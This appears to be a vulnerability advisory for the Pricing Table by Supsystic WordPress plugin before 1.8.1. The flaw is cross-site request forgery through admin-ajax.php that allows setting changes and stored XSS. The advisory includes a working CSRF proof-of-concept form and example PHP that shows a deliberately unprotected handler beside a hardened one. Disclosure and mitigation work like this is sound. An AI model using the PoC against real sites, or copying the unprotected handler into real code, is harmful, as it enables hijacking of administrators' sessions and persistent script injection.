Pricing Table by Supsystic < 1.8.1 - Cross-Site Request Forgery to XSS and Setting Changes

Description
Every functionality of the Pricing Table by Supsystic WordPress plugin that is reachable through admin-ajax.php can be triggered via Cross-Site Request Forgery in vulnerable versions: an attacker who gets a logged-in administrator to load a crafted page can change plugin settings and inject stored XSS payloads.
Proof of Concept
One example:
<html>
  <body>
    <!-- URL is a placeholder for the target site; the form submits the plugin's
         "saveAsCopy" action with an attacker-chosen label and no nonce -->
    <form action="https://URL/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="copy&#95;label" value="This&#32;is&#32;a&#32;test&#33;&#32;Copy" />
      <input type="hidden" name="mod" value="tables" />
      <input type="hidden" name="action" value="saveAsCopy" />
      <input type="hidden" name="id" value="8" />
      <input type="hidden" name="pl" value="pts" />
      <input type="hidden" name="reqType" value="ajax" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
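As an added illustration of the mitigation (example code written for this page, not the plugin's own source), below is a hypothetical admin-ajax handler in the unprotected form the advisory describes, beside a hardened form that verifies a nonce, checks capability and sanitizes input. The `example_*` function and action names are assumptions; the WordPress core API calls are real.

```php
<?php
// Hypothetical plugin code written for this advisory; not the Supsystic source.
// All wp_* / check_* / current_user_can calls are real WordPress core APIs.

// Unprotected pattern: the action trusts any request that carries the admin's
// session cookie. The browser attaches that cookie to a cross-site POST, so the
// forged form above executes this code with administrator privileges.
function example_save_as_copy_unprotected() {
    $id    = absint( $_POST['id'] );
    $label = $_POST['copy_label']; // stored unescaped: a stored-XSS sink
    update_option( 'example_table_copy_' . $id, $label, false );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_save_as_copy_unprotected', 'example_save_as_copy_unprotected' );

// Hardened pattern: a nonce binds the request to a page the admin actually loaded
// (an attacker site cannot read it), the capability check enforces least
// privilege, and the input is sanitized before it is stored or echoed back.
function example_save_as_copy_hardened() {
    // Terminates with HTTP 403 unless a valid nonce for this action is present in "_ajax_nonce".
    check_ajax_referer( 'example_save_as_copy', '_ajax_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    $id    = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $label = isset( $_POST['copy_label'] )
        ? sanitize_text_field( wp_unslash( $_POST['copy_label'] ) )
        : '';
    if ( 0 === $id || '' === $label ) {
        wp_send_json_error( array( 'message' => 'invalid input' ), 400 );
    }

    update_option( 'example_table_copy_' . $id, $label, false );
    wp_send_json_success( array( 'id' => $id, 'label' => esc_html( $label ) ) );
}
add_action( 'wp_ajax_example_save_as_copy_hardened', 'example_save_as_copy_hardened' );

// The plugin's own admin page hands the nonce to its JavaScript, which sends it
// with each request as "_ajax_nonce"; cross-origin pages cannot obtain it.
function example_enqueue_admin_js() {
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_save_as_copy' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_admin_js' );
```

With the hardened handler, the PoC form fails the nonce check before any plugin logic runs, which is the behaviour the 1.8.1 fix is expected to provide for each admin-ajax action.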

Affects Plugin

Fixed in version 1.8.1

References

CVE 2020-9396
URL https://www.wordfence.com/blog/2020/02/multiple-vulnerabilities-patched-in-pricing-table-by-supsystic-plugin/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Verified No
WPVDB ID 10092

Timeline

Publicly Published 2020-02-25
Added 2020-02-25
Last Updated 2020-02-26
